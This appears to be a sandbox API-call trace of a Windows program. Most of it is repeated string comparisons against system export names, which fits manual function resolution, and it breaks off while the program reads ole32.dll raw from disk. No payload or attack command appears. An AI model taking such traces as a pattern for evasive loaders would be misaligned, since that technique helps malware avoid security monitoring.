[0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0100.597] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0100.597] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.598] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0100.599] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0100.600] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.601] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0100.601] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0100.602] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0100.602] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0100.603] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0100.603] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.604] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0100.605] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0100.606] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0100.606] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0100.606] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0100.606] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0101.154] GetProcessHeap () returned 0x4f0000 [0101.154] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf2010 | out: hHeap=0x4f0000) returned 1 [0101.161] GetProcessHeap () returned 0x4f0000 [0101.161] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509210 [0101.161] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0101.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0101.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0101.162] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0101.162] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0101.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0101.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0101.162] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0101.162] GetProcessHeap () returned 0x4f0000 [0101.162] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x142d00) returned 0x40b7040 [0101.165] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0101.165] ReadFile (in: hFile=0x140, lpBuffer=0x40b7040, nNumberOfBytesToRead=0x142d00, 